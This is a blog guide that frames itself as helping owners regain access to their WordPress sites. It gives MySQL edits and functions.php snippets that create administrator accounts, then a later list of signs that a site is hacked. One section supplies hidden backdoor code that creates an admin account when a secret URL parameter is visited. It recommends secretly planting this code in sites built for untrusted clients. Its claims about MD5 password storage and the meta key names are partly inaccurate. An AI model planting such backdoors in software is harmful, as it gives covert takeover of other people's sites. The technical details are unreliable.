How to Hack Into a WordPress Website, The Complete Guide

We don’t condone, approve nor encourage any illegal or malicious behavior! The purpose of this article is to explain how to hack or regain access to a WordPress site that belongs to you, or that you have rights to edit, admin and access. Whatever you do, you’re doing it on your own. We’re not responsible for your actions. This guide serves only for educational purposes.

Described methods will help you regain access to the site even if you no longer have an account, but will require some info about the site and they won’t help you hack into any random WordPress installation.

In this guide, we are about to show you:

How to hack into a WordPress website, the complete guide

Situations you can help yourself in

If you’re in one of the following situations, our methods will help you regain access:

  • you forgot the username or email address
  • reset password option does not work on the hosting server
  • reset password emails are not coming through
  • you no longer have access to the account’s email address
  • you know the username & password, but the combination just does not work

To use the methods described below, you’ll need only one of the following:

  • FTP access to the server, or
  • cPanel access to the server, or
  • access to the MySQL database and the ability to connect to it remotely

Method #1 – the MySQL way

Use this method to change the password (or username if needed) of an existing user or to create a new account. You’ll need cPanel access or direct MySQL access to the site’s database. Let’s get started by changing the password of an existing user.

If you’re using cPanel, login (cPanel can always be accessed via the https://yoursite.com:2083 link), locate and open phpMyAdmin. The list of databases and tables is on the left. You’re looking for the table that ends in _users. It’ll probably be wp_users, but if you have more than one WordPress site installed on the server, you have to find the right one.

The right table will have the user you want to edit in it. Follow the same procedure if you’re connecting to MySQL via some external client like SQLyog. Once you locate the table and the actual user record, it’s time to change the password.

As you’ve probably figured out by now, the password is saved in the user_pass field, hashed using the MD5 algorithm. Open the online MD5 generator enter the password you want to use and click “Hash”. Copy the generated string and replace the original password with it. In phpMyAdmin, you can edit the field by double-clicking on it. The procedure is similar in other MySQL clients. Save changes and login to WordPress with your new password.

WP users table

Usernames, hashed passwords and emails are stored in the wp_users database table

Still on method #1 – creating a new user

Creating a new user is a bit more complicated but still manageable in less than a minute. Create a new record in users table and populate: user_login, user_pass (hashed, using the MD5 function described above) and user_email. All other fields can remain empty; they don’t matter. Save the new record. Once saved, MySQL will give it a unique ID. It’s the number in the ID field. Remember it.

Now go to _usermeta table. Remember, the table’s prefix has to be the same as the users’ one. For instance wp_users and wp_usersmeta. If the prefix is not the same, you’re editing the wrong table (of some other WP installation) and the new account won’t work. We’ll create two new records. Ignore the umeta_id field for both of them. Set user_id field to the value you just remembered (the new ID value in users table). For the first record set meta_key to wpct_user_level and meta_value to 10. For the second one meta_key to wpct_capabilities and meta_value to a:1:{s:13:"administrator";b:1;}. Save both. You’re done – login!

Method #2 – the functions.php way

This approach can be utilized either by editing functions.php through cPanel or by using an FTP client to do so. If using cPanel find File Manager and open it. First, we have to find the active theme’s folder.

Go to public_html/wp_content/themes folder. If you immediately see your theme and know which one it is – great. Open its folder and start editing functions.php. If not, open the site, right-click anywhere, select “View source”. Then press Ctrl + F and start typing /themes/ soon you’ll have a lot of URLs highlighted, and you’ll recognize the folder name of the active theme.

Find it in the file structure, open, and start editing functions.php. Copy/paste the following code at the end of the file. Mind the closing ?> PHP tags if you have them. They have to be on the last line. So insert the code before them.

$new_user_email = 'myemail@domain.com';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

Edit only the first two lines of the code to reflect your new account. If there’s already a user in WP with that email a new account won’t be created, so make sure it’s new. Change the password as well – don’t get hacked by script kiddies. After saving the file simply open your site, the code will be run, a new account with administrator privileges created and you’ll be able to login with it.

After you do so, remember to delete the code from functions.php.

Other hacking methods

By knowing the FTP, cPanel or MySQL password you’re proving that you have legitimate access right to the server and therefore should have access to the WordPress installation(s) as well. If you don’t have any of those accounts, then you’re up to no good (hacking into other people sites), and that’s not nice!

Please remember that gaining unauthorized access to any computers, sites or servers is a serious crime and is promptly dealt with in most countries.

If you are scared that your WordPress site can be hacked, please check this page with free WordPress security scanner. If you don’t have time to set up your blog, let us do it for you.

How to create a backdoor in WordPress

When the front door is closed, you might try the back door. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.

If it’s creating websites for other people something you do, sooner or later there will be a client who will refuse to pay you for your work; a client who will delete your login information and take over control of everything you have done. Sometimes, it will be enough to create a new user via FTP or to reset a password. When that’s not enough, you might want to hack your way back in or create a backdoor access to your admin pages.

But if you decided to hide a small piece of code in your WordPress environment, you might save yourself some dignity and gain access to the WordPress site with administrator privileges. And that’s where the games begin.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

  1. Open functions.php file
  2. Copy/Paste following code:
  3. add_action('wp_head', 'wploop_backdoor'); 
    function wploop_backdoor() {
            If ($_GET['backdoor'] == 'knockknock') {
                    require('wp-includes/registration.php');
                    If (!username_exists('username')) {
                            $user_id = wp_create_user('name', 'pass');
                            $user = new WP_User($user_id);
                            $user->set_role('administrator');
                    }
            }
    }
    ?>
  4. Save changes

If you leave the code as it is, all you would have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=knockknock

After the page was loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.

Try the function – not only it is fun but it can really help you sometime in the future when you’re about to make a website for someone you can’t trust completely. You should also level up your WordPress and blogging skills.

How to create a new user account via FTP

Creating new user accounts on WordPress is very easy. As an admin, you need to navigate to Users admin page where you can create a new account for any user role. That can be done in a matter of seconds and a newly created user can immediately log in with given username and password.

But what happens if you lose access to your WordPress admin? Things might get a bit more complicated, but don’t worry – we have a function for you which can save your admin life.

Whether another admin deleted your account, whether you have deleted all users from the database by mistake, used a malfunctioning plugin or got hacked, you can still get back in control. Sometimes you might be able to get access only to your FTP server while the HTTP one will be out of your reach and you will need to create a new admin. While that might be a rare case, the following function will save you.

To create a new account outside WordPress admin environment, all you will need is an FTP access to your site. As an admin, you should have all the needed information to log in to your server and you can quickly create a new account by creating a new function in your theme.

Create a new user account via FTP:

  1. Open FTP client and connect to your account
  2. Navigate to wp-content/themes
  3. Open the folder of the theme you are using
  4. Search for functions.php file and edit it
  5. Copy and paste the following function:
  6. function admin_account(){
    $user = 'Username';
    $pass = 'Password';
    $email = 'email@domain.com';
    if ( !username_exists( $user )  && !email_exists( $email ) ) {
    $user_id = wp_create_user( $user, $pass, $email );
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );
    } }
    add_action('init','admin_account');
    
  7. Change username, password, and email to something unique
  8. Save changes

Make sure that username, password and email address which you set in the function are unique or otherwise the function won’t work properly. Once you have saved the changes, you’re done and you can navigate to your WP login panel. Use new information to log back in and once you have verified the account, you can delete the function from the functions.php file.

The function shown above creates an admin account but you can easily modify it to create an account with any other user role. Simply change the role on the 8th row of the code to the editor, author, contributor, subscriber or any other user role you have created.

Unfortunately, if you have lost your admin account, you have also lost all the posts written under that username. That’s why you should always keep a backup which you can easily retrieve. If you’re reading this while having your admin account, take this as a reminder to create a backup immediately and bookmark this article just in case you need to create an account outside WordPress in the future.

10 signs your WordPress site is hacked

WordPress is a huge blogging platform. There are millions of users and it seems that the number is rapidly growing each and every day. People even tend to transfer their websites created in other content management systems to this open source system more often than you might think. And, while this is good, this means that hackers will also put WordPress in a number-one spot when trying to invade random sites.

Usually, if you get hacked, you will know about that instantly. Your site will become inaccessible; you won’t be able to log in and sometimes a hacker will even leave a message on the front page. But more often than not, you might not even notice that something has changed. In this part of the article, we’re about to show you several signs that might show you that your WordPress site got hacked and a few solutions to the problem.

1. Unsuccessful login

This sign is pretty much evident. If you have used a username and password combination for a while without ever having trouble, you may get suspicious if suddenly WordPress doesn’t recognize your account. If a hacker got to log in to your site, the chances are that he will quickly change your admin privileges.

Maybe he got to change your password or completely deleted your account. Before you start to panic after the first time WordPress messages you about incorrect username/password, please consider the fact that you might have entered a wrong combination or that you may have turned on the caps lock button.

Solution: Try recovering the password via email or use another account to log back in. To make sure that you login stays safe, we recommend installing Login Ninja plugin for WordPress.

2. Malicious content is added to your site

Site contains a malware warning

If you start noticing unfamiliar content on your site, you may start worrying. When they get a chance to access your admin area, hackers will be able to change your core and both your theme and plugin files. That means that they get to change anything they want.

While some hackers will drastically modify the looks of your site and maybe even spell out that you got hacked, the other ones will be much more subtle about it.

Solution: Try looking for hidden content in the website code. There might be links to malicious sites hackers planted in the footer of your site, or they might have installed popups which will open on a regular basis to your customers. Use Security Ninja to scan your site or continuously monitor your site for such problems.

3. Suspicious visits

If you are not tracking your website, you should start doing so immediately. A simple way to do is using Google Analytics which, among many other features, can tell you how many visits do you get and where are those visits coming from. After some time, you will get to know your website. That means that you will know where are the visits coming from, you will know when you launch a new campaign and when there are new promotion links released in the wild.

But if you suddenly notice that your site is getting a huge number of new visits from the suspicious domain, you will want to investigate this further because your site might just get hacked. Usually, that kind of visits will result in a 100% bounce rate which means that only one page was accessed. Hackers will frequently use automated systems that will lead other bad sites to yours. Whether it’s the bad code that gets executed on your site or you have become a part of a spamming network, things can get serious, and you will have to check your site for malicious code.

Solution: Use Google Webmasters Tools to find suspicious domains

4. A sudden drop in traffic

Safe browsing Ssite status

Unlike the last mentioned sign of getting hacked, this one might alert you because there is suddenly a drop in the number of visits. Instead of referring new visits to you, a hacker might send visits away from your site. This might happen because a hacker redirected your site to another one. The other reason for getting fewer visitors is that Google blacklisted your site. This action would show a message to every user who may choose not to open your site because it is infected.

Solution: Use Google’s Safe Browsing Site Status to check if your site is marked as unsafe and is currently dangerous to visit.

5. Search engine results are strange

If you haven’t noticed any changes on your site, but you do find out that search results in Google and other search engines are strange (show different titles and other meta-data), this might be a clear sign of a hacked site. A hacker might have changed your content in a way which can be visible only to an expert. Still, the change would be visible in the search engine results.

Solution: Check your site with Google Webmasters Tools, and check if your site got hacked with this free online tool.

6. You can’t send/receive emails

Once a hacker gets access to your site, he will probably want to use your server for spamming everyone else. When you find out that you can’t send or receive new emails from your WordPress, this can be a clear sign that you got hacked. Check your email once again, then check it with your provider to make sure that there aren’t any errors.

Solution: Test your WordPress mail function with this free plugin.

7. Site doesn’t exist

Server not found

There are times when hackers won’t access your site to plant malicious code, redirect users or use your email for spam. Sometimes, all they will want to do is to crash your site. Rarely, a hacker will successfully delete everything from the entire server. That’s why it is important that you host your files at a renowned hosting company which will take of security and also keep daily or at least weekly backups of your website. It’s a good practice that you also do your own backups from time to time so that the site can be quickly restored.

Solution: Install one of the best plugins for backup management in WordPress.

8. Suspicious files

Similar to malicious content which may be added to existing files, a hacker might plant extra files anywhere within your root folder. It’s a good thing to know your way around WordPress, but if you’re not that experienced, you should have a security tool at your disposal which can check all of your files and activities. Recently, we reviewed the Security Ninja which is a perfect tool for checking all of your WordPress files.

Solution: Try looking for files which don’t belong to your WordPress installation. Use Security Ninja to scan your site on a regular basis and find those files automatically. Then delete the files or remove the malicious code from infected files. Don’t forget the Core Scanner add-on for Security Ninja.

9. New members

Depending on your site, you might be the only one able to add new members. In that case, an email telling you about newly registered users might trigger an alarm. If there are other admins who have the ability to add new members, check with them about suspicious activity.

Solution: Change login URL with a free plugin, limit access to your WordPress login page by using .htpasswd file and use Login Ninja to protect your login form all the time.

10. Check out scheduled events on your server

Sometimes, a hacker won’t do a thing to your website once they find their way in. Instead, they will leave scheduled events which may harm your site sometime in the future. This technique is dangerous because a hacker can leave inexperienced victim clueless at first. You may be infected and know nothing about it.

Solution: Check your CRON jobs on a server you’re using and make sure there are no suspicious scheduled tasks.

Wrapping up

We hope that this article will help you manage even a safer WordPress site, and that it will help you regain access to it in bad situations. And even if your site is clean, please don’t take that for granted.
Always make sure that your blog is as safe as it can be. We suggest security plugins for WordPress which can save you at most times. Still, don’t be the one using unsafe password, and be careful when hacking into your own WordPress site.
Start Blog Book

START YOUR OWN BLOG

This guide is an introduction to mastering the art of blogging. It provides easy to follow steps to start, maintain, and grow your blog.

Read the guide

One thought on “How to Hack Into a WordPress Website, The Complete Guide

  1. Hi there! Quick question that’s completely off topic.

    Do you know how to make your site mobile friendly? My weblog
    looks weird when browsing from my iphone.
    I’m trying to find a theme or plugin that might be able to fix this problem.
    If you have any recommendations, please share.
    Many thanks!

Leave a Reply

Your email address will not be published. Required fields are marked *